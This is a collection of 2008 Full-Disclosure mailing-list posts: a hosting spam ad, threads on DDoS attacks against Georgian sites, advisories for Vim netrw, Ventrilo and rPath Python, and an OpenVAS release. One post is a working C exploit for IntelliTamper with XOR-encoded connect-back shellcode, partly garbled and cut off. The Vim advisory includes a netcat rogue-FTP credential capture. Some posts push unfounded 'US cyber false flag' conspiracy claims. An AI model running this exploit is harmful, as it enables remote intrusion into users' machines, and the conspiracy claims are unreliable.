[Full-disclosure] Storesonline, Ecommerce hosting solution - how to avoid mistakes that put your business at risk
*Storesonline, Ecommerce hosting solution - how to avoid mistakes that put your business at risk* Building an e-business inevitably requires a dedicated ecommerce hosting solution that can support the infrastructures. There are plenty of areas to take care of. Depending on your business types, you will need to consider the technical areas that support the e-business transactions. Then * Storesonline* is the right fit for you. You also need to have strong customer support from the website provider. Reputation and security are critical factors which sustain your business. In order to avoid pitfalls due to an inferior host, this article reveals the mentioned areas and helps you determine the steps to proceed further. *Storesonline* does avoid these pitfalls and it's working really well. Unlike hosting an ordinary website, running an ecommerce website such as an online store can demand a high technical focus. For instance, you may need a shopping cart and a payment processor. Other than these, you may also wish to have regular backup service, site monitoring or digital certificates that can protect your valuable business. If so, you have to choose an ecommerce web site hosting plan that fits your needs. But it is really dependent on the business size. If you sell a few products, a simple ecommerce web hosting will be sufficient. *Storesonline* can handle the smallest mom and pop site to the biggest on the planet. However, for a business site of much larger scale, you need to consider the server usage and bandwidth. In such case, a fast and stable server with bigger memories may be necessary. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] OpenID/Debian PRNG/DNS Cache poisoning advisory
On Fri, August 8, 2008 8:37 pm, Forrest J. Cavalier III wrote:
> Eric Rescorla wrote:
>>
>> To be concrete, we have 2^15 distinct keys, so, the
>> probability of a false positive becomes (2^15)/(2^b)=2^(b-15).
>> To get that probability below 1 billion, b+15 >= 30, so
>> you need about 45 bits. I chose 64 because it seemed to me
>> that a false positive probability of 2^{-48} or so was better.
> Since it's a known set, I think you can use perfect hashing.
> There will still be false positives,
Since we don't care _which_ bad key it is, wouldn't
as-imperfect-as-possible hashing be better, by minimizing false positives?
Seth
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [funsec] Internet attacks against Georgian web sites
People need to realize it's quite possible these are just kids who attacked Georgia, and what that means. On Mon, 11 Aug 2008, Paul Ferguson wrote: > -BEGIN PGP SIGNED MESSAGE- > Hash: SHA1 > > - -- Gadi Evron <[EMAIL PROTECTED]> wrote: > >> In the last days news and government web sites in Georgia suffered DDoS > attacks. While these attacks seem to affect the Georgian Internet, it is > still > there. >> > > Also, I wish to say: > > "It is clear that there are anti-Georgian forces at work on the > Internet." > > "Who they are, and what their motivations are 9at this point), > remains to be seen." > > - - ferg > > -BEGIN PGP SIGNATURE- > Version: PGP Desktop 9.6.3 (Build 3017) > > wj8DBQFIn+HCq1pz9mNUZTMRAg5bAKC14z8wNBom1TASstp9D6n3fL4bLwCfSzxU > cQcPfvWSi7j3Bwpgy1hPZJM= > =5lFT > -END PGP SIGNATURE- > > > -- > "Fergie", a.k.a. Paul Ferguson > Engineering Architecture for the Internet > fergdawg(at)netzero.net > ferg's tech blog: http://fergdawg.blogspot.com/ > > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [funsec] Internet attacks against Georgian web sites
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Gadi Evron <[EMAIL PROTECTED]> wrote: >People need to realize it's quite possible these are just kids who attacked Georgia, and what that means. > Certainly -- anything is possible. I would note, however, that if it _is_ "kids", then they have access to the same servers/services being used by other "known" criminal elements. - - ferg -BEGIN PGP SIGNATURE- Version: PGP Desktop 9.6.3 (Build 3017) wj8DBQFIohKqq1pz9mNUZTMRArkhAKD7uqnFEai2aGW1rkxkHIYfF0y3TACfekM/ Pl9LCRceBBFmAtZ+2jLldMk= =0TXm -END PGP SIGNATURE- -- "Fergie", a.k.a. Paul Ferguson Engineering Architecture for the Internet fergdawg(at)netzero.net ferg's tech blog: http://fergdawg.blogspot.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [funsec] Internet attacks against Georgian web sites
On Tue, 12 Aug 2008, Paul Ferguson wrote: > -BEGIN PGP SIGNED MESSAGE- > Hash: SHA1 > > - -- Gadi Evron <[EMAIL PROTECTED]> wrote: > >> People need to realize it's quite possible these are just kids who > attacked Georgia, and what that means. >> > > Certainly -- anything is possible. > > I would note, however, that if it _is_ "kids", then they have access > to the same servers/services being used by other "known" criminal > elements. Russian speaking elements who live there, read the papers, etc. We are all dissidents in our own way. Gadi. > - - ferg > > -BEGIN PGP SIGNATURE- > Version: PGP Desktop 9.6.3 (Build 3017) > > wj8DBQFIohKqq1pz9mNUZTMRArkhAKD7uqnFEai2aGW1rkxkHIYfF0y3TACfekM/ > Pl9LCRceBBFmAtZ+2jLldMk= > =0TXm > -END PGP SIGNATURE- > > > > -- > "Fergie", a.k.a. Paul Ferguson > Engineering Architecture for the Internet > fergdawg(at)netzero.net > ferg's tech blog: http://fergdawg.blogspot.com/ > > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Internet attacks against Georgian web sites
Hi all, As a comment to Gadi's story: it's not nice to accuse anyone if it's still not clear who's behind all this and what is really happening. As a matter of fact, personally I trust Saakashvili allmost the same as I trust Medvedev - i'd bet both sides try to make themselves "white and fluffy bunny rabbits being bullied by the opposite side". I would say, it's too early to make anykind of conclusions or tell anykind of facts - a serious media-war is going on, and if you ask me - it's the only fact which we may trust. As an example you can switch CNN or SkyNews, and then for example switch to ORT or NTV (Russia's first and second biggest channels) - it's two 100% diametric positions with different facts, different oppinions and different pictures. I suppose it's wiser not to start stories on cyberwar and just wait until both sides cool down - to see what was really behind all that: mr. Saakashvili's fantasy or a serious act of cyber warfare. By the way, Lithuanians are not the case, seriously, it was an internal act of lithuanian kiddie-comrades as far as I know, and has nothing to do with cyber warfare. As a matter of fact I would add another fact as point 5. to your list, more of a humrous type, possibly everybody already know this, but just in case: 5. Georgian Foreign ministry let's say "moved" their website to Blogsport. :) http://cabalamat.wordpress.com/2008/08/12/georgian-foreign-ministry-news -service/ I will not be suprised if in some time the Saakashvili will make his official e-mail adress: [EMAIL PROTECTED] :) Kindest regards, Viktor -Original Message- From: Gadi Evron [mailto:[EMAIL PROTECTED] Sent: Monday, August 11, 2008 9:40 AM To: [EMAIL PROTECTED] Cc: full-disclosure@lists.grok.org.uk; [EMAIL PROTECTED] Subject: Internet attacks against Georgian web sites In the last days news and government web sites in Georgia suffered DDoS attacks. While these attacks seem to affect the Georgian Internet, it is still there. Facts: 1. There are botnet attacks against .ge websites. 2. These attacks affect the .ge Internet infrastructure, but it's reachable. 3. It doesn't seem Internet infrastructure is directly attacked. 4. Every other political tension in the past 10 years, from a comic of the Prophet Muhammad to the war in Iraq, were followed by online supporters attacking targets which seem affiliated with the opposing side, and vise-versa. Up to the Estonian war, such attacks would be called "hacker enthusiast attacks" or "cyber terrorism" (of the weak sort). Nowadays any attack with a political nature seems to get the "information warfare" tag. When 300 Lithuanian web sites were defaced last month, "cyber war" was the buzzword. Running security for the Israeli government Internet operation and later the Israeli government CERT such attacks were routine, and just by speaking on them in the local news outlets I started bigger so-called "wars" when enthusiasts responded in the story comments and then attacks the "other side". Not every fighting is warfare. While Georgia is obviously under a DDoS attacks and it is political in nature, it doesn't so far seem different than any other online after-math by fans. Political tensions are always followed by online attacks by sympathizers. Could this somehow be indirect Russian action? Yes, but considering Russia is past playing nice and uses real bombs, they could have attacked more strategic targets or eliminated the infrastructure kinetically. Coulda, shoulda⦠the nature of what's going on isn't clear, but until we are certain anything state-sponsored is happening on the Internet it is my official opinion this is not warfare, but just some unaffiliated attacks by Russian hackers and/or some rioting by enthusiastic Russian supporters. It is too early to say for sure what this is and who is behind it. The RBN blog (following the Russian Business Network) is of a different opinion: http://rbnexploit.blogspot.com/2008/08/rbn-georgia-cyberwarfare.html and: http://rbnexploit.blogspot.com/2008/08/rbn-georgia-cyberwarfare-2-sat-16-00. html Also, Renesys has been following the situation and provides with some data: http://www.renesys.com/blog/2008/08/georgia_clings_to_the_net.shtml (Thanks to Paul Ferguson for the URLs) DDoS attacks harm the Internet itself rather than just this or that web site, so soon this may require some of us in the Internet security operations community getting involved in mitigating the attacks, if they don't just drop on their own. Gadi Evron. -- "You don't need your firewalls! Gadi is Israel's firewall." -- Itzik (Isaac) Cohen, "Computers czar", Senior Deputy to the Accountant General, Israel's Ministry of Finance, at the government's CIO conference, 2005. (after two very funny self-deprication quotes, time to even things up!) My profile and resume: http://www.linkedin.com/in/gadievron ___ Full-Disclosure - We believe in it. Charter: htt
[Full-disclosure] IntelliTamper v2.07/2.08 Beta 4 A HREF sploit
Old exploit, released for the masses.
kralor, Crpt & HiC.
//
/* [Crpt] IntelliTamper v2.07/2.08 Beta 4 sploit by kralor [Crpt] */
//
/* NO MORE */
/* CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL */
/* CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL */
/* CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL */
/* CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL */
//
/* Exploit testé sur Jef_FR a son insu, ca marche bien a 100% :)*/
/* Jef_FR pourra vous le confirmer hihi :P */
/* Au fait c'est universel pcq si la personne utilise la v2.08beta4 */
/* ben y'a du SEH alors le premier lien qui est fait plus petit */
/* pour la v2.07 ca fera pas planter, ca sera pris en charge par le */
/* programme.. Bref que dire de plus... Si ce n'est qu'on peut p-e */
/* jumper direct sans aller a un jmp ebx, en utilisant 0x00F1FFDC */
/* j'ai remarqué que sur les deux versions une fois que ca crash*/
/* (je catch l'exception meme si le prog a du SEH!) ebx pointe vers */
/* cet offset toujours le meme (~fin de notre buffer). J'ai pas */
/* regardé sur d'autres plateformes, vu que j'ai deja des ret */
/* (jmp ebx) qui vont tres bien :) c'est tout les poulets, enjoy. */
/* */
/* P.S: Faut regarder que votre IP xoré par 0x98 donne pas un bad */
/* opcode du genre < > " \r \n ... C'est pas sorcier a coder :) */
//
/* informations: www.coromputer.net, irc undernet #coromputer */
//
#include
#include
#include
#ifdef _WIN32
#include
#pragma comment(lib, "ws2_32")
#else
#include
#endif
#define SIZEOF 14448 /* IntelliTamper v2.08 Beta 4 AND v2.07
* for v2.07 it isn't this size 'cause
* there's a *missing* in RET_ADDR2
* so it cuts the size.
*/
#define SCOFFSET 1 /* IntelliTamper v2.08 Beta 4 */
#define RET_POS SIZEOF-4
#define RET_ADDR 0x004368C4
#define SCOFFSET2 100 /* IntelliTamper v2.07 */
#define RET_POS2 6832
#define RET_ADDR2 0x00437224
#define u_short unsigned short
#define u_char unsigned char
#define HOP 0xd9 /* host opcode */
#define POP 0xda /* port opcode */
#define BEGIN "hi\r\n\r\n"
#define END "\r\n"
int set_sc(char *host,unsigned long port, char *sc)
{
unsigned long ip,p;
unsigned int i;
ip=inet_addr(host)^0x98989898;
p=htons((u_short)port);
p=p<<16;
p+=0x0002;
p=p^0x98989898;
for(i=0;i \n",prog);
exit(0);
}
void banner(void)
{
printf("\n\t[Crpt] IntelliTamper v2.07/2.08 Beta 4 sploit " \
"by kralor [Crpt]\n");
printf("\t\t www.coromputer.net && undernet #coromputer\n\n");
return;
}
int main(int argc, char *argv[])
{
char buffer[SIZEOF];
unsigned long port;
FILE *file;
char shellc0de[] = /* sizeof(shellc0de+xorer) == 334 bytes */
/* classic xorer */
/* "\xcc" */
"\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x5b\x80\xc3\x10\x33\xc9\x66"
"\xb9\x3f\x01\x80\x33\x98\x43\xe2\xfa"
/* shellc0de */
"\x19\x5c\x50\x98\x98\x98\x13\x74\x13\x6c\xcd\xce\xfc\x39\xa8\x98"
"\x98\x98\x13\xd8\x94\x13\xe8\x84\x35\x13\xf0\x90\x73\x98\x13\x5d"
"\xc6\xc5\x11\x9e\x67\xae\xf0\x16\xd6\x96\x74\x70\x35\x98\x98\x98"
"\xf0\xab\xaa\x98\x98\xf0\xef\xeb\xaa\xc7\xcc\x67\x48\x13\x60\xcf"
"\xf0\x41\x91\x6d\x35\x70\x0b\x98\x98\x98\xab\x51\xc9\xc9\xc9\xc9"
"\xd9\xc9\xd9\xc9\x67\x48\x11\xde\xbc\xcf\xf0\x74\x61\x32\xf8\x70"
"\xe1\x98\x98\x98\xf0\xd9\xd9\xd9\xd9\xf0\xda\xda\xda\xda\x13\x54"
"\xf2\x88\xc9\x67\xee\xbc\x67\x48\xf0\xfb\xf5\xfc\x98\x11\xfe\xa8"
"\x67\xae\xf0\xea\x66\x2b\x8e\x70\xc9\x98\x98\x98\x11\xde\x86\x1b"
"\x74\xcc\x15\xa4\xbc\xab\x58\xab\x51\x1b\x59\x8d\x33\x7a\x65\x5e"
"\xdc\xbc\x88\xdc\x66\xdc\xbc\xa5\x66\xdc\xbc\xa4\x13\xde\xbc\x11"
"\xdc\xbc\xd0\x11\xdc\xbc\xd4\x11\xdc\xbc\xc8\x15\xdc\xbc\x88\xcc"
"\xc8\xc9\xc9\xc9\xf2\x99\xc9\xc9\x67\xee\xa8\xc9\x67\xce\x86\x67"
"\xae\xf0\x77\x56\x78\xf8\x70\x9a\x98\x98\x98\x67\x48\xcb\xcd\xce"
"\xcf\x13\xf4\xbc\x80\x13\xdd\xa4\x13\xcc\x9d\xe0\x9b\x4d\x13\xd2"
"\x80\x13\xc2\xb8\x9b\x45\x7b\xaa\xd1\x13\xac\x13\x9b\x6d\xab\x67"
"\x64\xab\x58\x34\xa2\x5c\xec\x9f\x59\x57\x95\x9b\x60\x73\x6a\xa3"
"\xe4\xbc\x8c\xed\x79\x13\xc2\xbc\x9b\x45\xfe\x13\x94\xd3\x13\xc2"
"\x84\x9b\x45\x13\x9c\x13\x9b\x5d\x73\x9a\xab\x58\x13\x4d\xc7\xc6"
"\xc5\xc3\x5a\x9c\x98";
banner();
if(argc!=4)
syntax(argv[0]);
por
Re: [Full-disclosure] Vim: Netrw: FTP User Name and Password Disclosure
On 12/08/08 23:59, Jan Minář wrote: > Vim: Netrw: FTP User Name and Password Disclosure > > 1. SUMMARY > > Product : Vim -- Vi IMproved > Versions : Tested with Vim 7.1.266, 7.2, autoload/netrw.vim v131, v109 > Impact : Credentials disclosure > Wherefrom: Remote > Original : http://www.rdancer.org/vulnerablevim-netrw-credentials-dis.html > > The Vim Netrw Plugin shares the FTP user name and password across all > FTP sessions. Every time Vim makes a new FTP connection, it sends the > user name and password of the previous FTP session to the FTP server. > > > 2. BACKGROUND > >``Vim is an almost compatible version of the UNIX editor Vi. Many new > features have been added: multi-level undo, syntax highlighting, > command line history, on-line help, spell checking, filename > completion, block operations, etc.'' > > -- Vim README.txt > >``Netrw supports "transparent" editing of files on other machines > using [...] vim ftp://hostname/path/to/file'' > >``Attempts to use ftp will prompt you for a user-id and a password. > These will be saved in global variables g:netrw_uid and > s:netrw_passwd; subsequent uses of ftp will re-use those two items > to simplify the further use of ftp. However, if you need to use a > different user id and/or password, you'll want to call NetUserPass() > first.'' > > -- Netrw Reference Manual (``pi_netrw.txt'') > > > 3. VULNERABILITY > > Once vim successfully connects to an FTP server using a user name and > password credentials, it will re-use them in all subsequent FTP > sessions, regardless of the domain name or TCP port. > > This behaviour is documented, although the documentation states the > credentials are ``retained on a per-session basis''. Apparently the Vim > session, not the FTP session: > >``g:netrw_uid (ftp) user-id,retained on a per-session basis > s:netrw_passwd (ftp) password, retained on a per-session basis'' > > -- Netrw Reference Manual (``pi_netrw.txt'') > > Although FTP communication is not encrypted and therefore open to > eavesdropping, if the access to the network is protected, a > credentials-based access control is meaningful, and the credentials must > be kept secret. For example, an FTP connection to a virtual Xen > instance on the same physical machine is secure; so is an FTP session > over a local ethernet segment secured against access from untrusted > parties. > > > 4. EXPLOIT > > No adversary action on the part of the attacker is necessary, apart from > keeping logs of the user name, password, source IP address, and other > information about the FTP session. > > An example using netcat(1) for the rouge FTP server. There is another > FTP server already running on the machine: > > # For the sake of this example, a custom hosts file. Note that > # ftp.secure.example and ftp.rogue.example map to different IP > # addresses. > $ grep '\.example' /etc/hosts > 127.0.1.1 ftp.secure.example > 127.0.1.2 ftp.rogue.example > # There is a stock FTP server running already > $ netstat -plan | grep ftp > tcp 0 0 0.0.0.0:21 0.0.0.0:* LISTEN 30623/vsftpd > # Start the rogue FTP server > $ printf '220\r\n331\r\n' \ > | netcat -lp 31337 ftp.rogue.example> credentials& > # We use the ex command for clarity. > $ ex ftp://ftp.secure.example/ > Enter username: rdancer > Enter Password: * > Entering Ex mode. Type "visual" to go to Normal mode. > :spl ftp://ftp.rogue.example:31337/ > "ftp://ftp.rogue.example:31337/"; --No lines in buffer-- > :qa! > $ cat credentials > USER rdancer > PASS z5vS24u76OrGM > > > 5. COPYRIGHT > > This advisory is Copyright 2008 Jan Minar<[EMAIL PROTECTED]> > > Copying welcome, under the Creative Commons ``Attribution-Share Alike'' > License http://creativecommons.org/licenses/by-sa/2.0/uk/ > > Code included herein, and accompanying this advisory, may be copied > according to the GNU General Public License version 2, or the Vim > license. See the subdirectory ``licenses''. > > Various portions of the accompanying code may have been written by > various parties. Those parties may hold copyright, and those portions > may be copied according to their respective licenses. > > > 6. HISTORY > > 2008-08-12 Sent to:<[EMAIL PROTECTED]>,<[EMAIL PROTECTED]>, > , > <[EMAIL PROTECTED]>, > Charles E Campbell, Jr (Vim Netrw Plugin Maintainer) > <[EMAIL PROTECTED]> If the attacker has access to full logs of the FTP back-and-forth talk, is it possible to keep the username and password secret? Netrw mentions that if there exists a .netrc file (which ftp will use if it is not world-readable, e.g. on Linux it needs 600 permissions) which includes an applicable "machine" or "default" line, the user won't be asked for a username and password (see ":help netrw-netrc"). I
[Full-disclosure] (no subject)
Title: Hushmail Express [EMAIL PROTECTED] has sent you a secure email using Hushmail. To read it, please visit the following web page: https://www.hushmail.com/express/4JS7VCHT Frequently Asked Questions: Why did I receive this email? You have received this email because you have been sent a secure email through Hushmail. To read your secure email, you must follow the link provided and correctly answer a secret question chosen by the sender. What is a secure email? Sending a regular email is like sending a postcard - it may be read by any number of people before reaching its recipient(s). A secure email is like sending a letter in a sealed envelope - it can only be read by the sender and intended recipient(s). Is it safe to follow the link in this email? Yes, it is safe to visit the Hushmail web site by following the link provided in this email. However, you should never open an email attachment unless you know the person who sent it, were expecting to receive the file from them, and have scanned the file for viruses. When you arrive at the Hushmail web site, be sure to check the following: The address bar of your web browser shows: https://www.hushmail.com/express/ A small picture of a padlock appears in the bottom right corner of your web browser If you would prefer to access your message by entering its message code, please visit the following web page: https://www.hushmail.com/express. You will be asked to enter the following message code: 4JS7 VCHT What is Hushmail? Hushmail is a web-based email service that lets you send and receive email in total security using OpenPGP standard algorithms. These algorithms, combined with Hushmail's unique key management system, provide unrivalled levels of security. Hushmail's encryption is automatic, transparent, and seamless - no special computer skills are required. How do I create a free Hushmail account? You can create a free Hushmail account by clicking on the following link: https://www.hushmail.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] OpenVAS Stable Release
Hello, the OpenVAS project is proud to announce the release of the first stable version of the "Open Vulnerability Assessment System". OpenVAS is a fork of the Nessus security scanner; while Nessus switched to a proprietary license, OpenVAS will continue to improve the scanner and will provide all components as Free Software. In July 2008 the OpenVAS developer team finished the update cycle of the 1.0 release including all four server modules and the client. The most work during this update cycle went into cleanups and support for RPM and Debian packagers. The number of necessary bug-fixes remained pleasingly low. OpenVAS installation packages are readily available for various platforms: OpenSUSE, Fedora, Mandrake, FreeBSD and Gentoo. Packages for Debian and Ubuntu are in the works. Additionally, OpenVAS-Client is available for Microsoft Windows operating systems. The OpenVAS developer team has started creating a comprehensive documentation for the whole toolchain; the next major challenge for the project is now to extend the range of the vulnerability tests for present and upcoming security issues, especially for those reported as CVEs, BIDs etc. It is a fundamental goal of the OpenVAS project team to accompany the Free Software OpenVAS network security scanner licensed under GNU GPL with a feed of vulnerability tests being Open Source and readily available for everyone as well. Additional contributors are welcome to join the OpenVAS developer team. For more information please visit: http://www.openvas.org/ Regards, Michael Wiegand -- Michael Wiegand OpenPGP key: D7D049EC Intevation GmbH, Osnabrückhttp://www.intevation.de/ Amtsgericht Osnabrück, HR B 18998 Geschäftsführer: Frank Koormann, Bernhard Reiter, Dr. Jan-Oliver Wagner ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Internet attacks against Georgian web sites
On Wed, Aug 13, 2008 at 6:43 AM, Viktor Larionov <[EMAIL PROTECTED]> wrote: > Hi all, > > As a comment to Gadi's story: it's not nice to accuse anyone if it's still > not clear who's behind all this and what is really happening. > It would be great for the U.S to take down the .ge sites while Russia is attacking Georgia in a ground conflict, as it ramps up U.S's ambitions for an offensive cyber command. They already cyber false flagged Estonia to get money support politically and public acceptance for the big U.S cyber command to get built in the first place. Now that the big U.S cyber command has been given the go ahead because of the Estonia cyber false flag, they've got to keep reasons in the media that the U.S cyber command is still a good idea. Russia gets all the blame for the .ge cyber attacks and U.S get to keep the politicians and the public sweet about the ongoing need for the big U.S cyber command and "legitimate" reasons for its existence. I couldn't think of a better time for U.S to do a bit of cyber false flagging, than is when another country invading another, while keeping U.S cyber ambitions afloat politically and publically. Remember, U.S need to keep the idea of ground conflict and cyber attacks as the same thing in the eyes of the public and the politicians or the idea of the U.S cyber command doesn't float. In reality, proper government-led cyber attacks wouldn't target web sites, this is purely an attention seeking exercise to highlight the ongoing need for the U.S cyber command. In reality, proper government-led cyber attacks are invisible to the public, as they are targeting specific government and military stuff that the public and politicians don't get a chance to know about. Its a classic media whoring exercise to take out web sites, as taking out websites has no real cyber operational value apart from a bit of media whoring. I don't think it was Russia, but Russia have been framed by the U.S. who need to keep the ideology of a U.S offensive cyber command afloat and OK'd as the next president and its administration take over, so that "cyber" gets full funding and the attention of Obama or McCain. Watch this video by Marcus Sachs at Black Hat 2008 http://www.youtube.com/watch?v=FSUPTZVlkyU, he talks about, how are we going to get the next president's attention in the transition period in the first 100 days of Obama or McCain getting into the White House and to take "cyber" seriously? Now by this video it seems that Marcus Sachs http://en.wikipedia.org/wiki/Marcus_Sachs is trying to say we need a cyber false flag attack in the first 100 days that Obama or McCain get into the White House to make sure "cyber" is fully funded and that cyber offensive operations are fully OK'd for the next four to eight years. "We want to get the attention of the next administration as they are coming in" --Marcus Sachs. He talks about the first two months or 100 days of the next presidency is crucial in getting the attention of the president and its administration. Is this a hidden message here by Marcus Sachs about a Die Hard 4.0 scenario false flag attack being planned? He said also in the video, when Bush was coming in, the powers that be got their attention with 9/11 and that "cyber" got distracted, and now he is basically saying when Obama or McCain come in that the U.S government under world are planning a cyber 9/11. It seems that Marcus Sachs is frustrated that 9/11 got all the attention last time, and now the powers of be are going to make sure "cyber" takes up the main agenda this time around. How are they going to get the attention of the next presidency to get "cyber" fully funded and taken seriously is anyones guess, but I fear the worst and that we must keep our eyes and ears open for any false flagging and other suspicious looking cyber security incidents, so we are better prepared to call out "false flag" at the earliest opportunity. All the best, n3td3v ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] NULL pointer in Ventrilo 3.0.2
### Luigi Auriemma Application: Ventrilo http://www.ventrilo.com Versions: <= 3.0.2 Platforms:Windows, Linux i386, Solaris SPARC, Solaris x86, FreeBSD i386, NetBSD i386, Mac OSX PowerPC Bug: NULL pointer Exploitation: remote, versus server Date: 13 Aug 2008 Authors: Andre MalmLuigi Auriemma web: sheepa.org e-mail: [EMAIL PROTECTED] web:aluigi.org ### 1) Introduction 2) Bug 3) The Code 4) Fix ### === 1) Introduction === Ventrilo is one of the most knwon and used voice chat softwares for gamers. ### == 2) Bug == Despite the vice of the Ventrilo developers of changing the protocol of their application enough often (like the recent senseless additional encryption keys located on their centralized servers needed for the handshake and the in-game packets of the 3.x servers), the first packet sent to a Ventrilo server has ever the same format on any new and old version: type 0, version and two random strings. If the server receives a version string different than its one it sends an "Incompatible version" error message to the client and skips the instructions that create the random keys used for the encryption and decryption of all the subsequent packets. So if an attacker supplies an invalid version and sends another packet with any content in it, the server crashes due to the key assigned for the decryption of the client's packets which is still unitialized (in fact the NULL pointer exception happens just in the decryption function). ### === 3) The Code === http://aluigi.org/poc/ventrilobotomy.zip ### == 4) Fix == No official fix. I have written an universal work-around which works with any version and platform (SPARC and Mac OSX excluded) of the dedicated server: http://aluigi.org/patches/ventrilobotomyfix.zip ### --- Luigi Auriemma http://aluigi.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] rPSA-2008-0243-1 idle python
rPath Security Advisory: 2008-0243-1 Published: 2008-08-13 Products: rPath Appliance Platform Linux Service 1 rPath Appliance Platform Linux Service 2 rPath Linux 1 rPath Linux 2 Rating: Major Exposure Level Classification: Indirect Deterministic Unauthorized Access Updated Versions: [EMAIL PROTECTED]:1/2.4.1-20.17-1 [EMAIL PROTECTED]:2/2.4.4-41-0.1 [EMAIL PROTECTED]:1/2.4.1-20.17-1 [EMAIL PROTECTED]:2/2.4.4-41-0.1 rPath Issue Tracking System: https://issues.rpath.com/browse/RPL-1412 https://issues.rpath.com/browse/RPL-2648 References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2316 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3142 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3143 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3144 Description: Previous versions of the python package are vulnerable to multiple attacks, the most serious of which may allow an attacker to execute arbitrary code. Additionally, previous versions of the python package on rPath Linux 2 and rPath Appliance Platform Linux Service 2 did not provide the bsddb module. This has been corrected. http://wiki.rpath.com/Advisories:rPSA-2008-0243 Copyright 2008 rPath, Inc. This file is distributed under the terms of the MIT License. A copy is available at http://www.rpath.com/permanent/mit-license.html ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Internet attacks against Georgian web sites
On Wed, Aug 13, 2008 at 7:35 PM, Jim Race <[EMAIL PROTECTED]> wrote: > http://www.nextgov.com/nextgov/ng_20080812_7995.php > "We want to get the attention of the next administration as they are coming in" --Marcus Sachs. Announcing this during the Georgia cyber attacks is well and truly calculated. It draws attention to U.S cyber ambitions while there is the Georgia cyber attacks happening, which makes my theory that the Georgia cyber attacks are U.S false flags even stronger. How else could U.S get the cyber command and U.S cyber ambitions in the media at exactly the same time as the Georgia cyber attacks, but to make up a story that the big U.S cyber command is shelved. Pentagon puts hold on USAF cyber effort http://ap.google.com/article/ALeqM5gCRZYKAcPy9kLZ4G3YvS-aMu2RrwD92HJ5VO2 They've done the false flag cyber attacks in Georgia, and now they are playing the media by keeping the ambitions of a big U.S cyber command front focus just at the right time. All the best, n3td3v -- Forwarded message -- From: n3td3v <[EMAIL PROTECTED]> Date: Wed, Aug 13, 2008 at 5:49 PM Subject: Re: [Full-disclosure] Internet attacks against Georgian web sites To: full-disclosure@lists.grok.org.uk Watch this video by Marcus Sachs at Black Hat 2008 http://www.youtube.com/watch?v=FSUPTZVlkyU, he talks about, how are we going to get the next president's attention in the transition period in the first 100 days of Obama or McCain getting into the White House and to take "cyber" seriously? Now by this video it seems that Marcus Sachs http://en.wikipedia.org/wiki/Marcus_Sachs is trying to say we need a cyber false flag attack in the first 100 days that Obama or McCain get into the White House to make sure "cyber" is fully funded and that cyber offensive operations are fully OK'd for the next four to eight years. "We want to get the attention of the next administration as they are coming in" --Marcus Sachs. He talks about the first two months or 100 days of the next presidency is crucial in getting the attention of the president and its administration. Is this a hidden message here by Marcus Sachs about a Die Hard 4.0 scenario false flag attack being planned? He said also in the video, when Bush was coming in, the powers that be got their attention with 9/11 and that "cyber" got distracted, and now he is basically saying when Obama or McCain come in that the U.S government under world are planning a cyber 9/11. It seems that Marcus Sachs is frustrated that 9/11 got all the attention last time, and now the powers of be are going to make sure "cyber" takes up the main agenda this time around. How are they going to get the attention of the next presidency to get "cyber" fully funded and taken seriously is anyones guess, but I fear the worst and that we must keep our eyes and ears open for any false flagging and other suspicious looking cyber security incidents, so we are better prepared to call out "false flag" at the earliest opportunity. All the best, n3td3v ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDVSA-2008:169 ] hplip
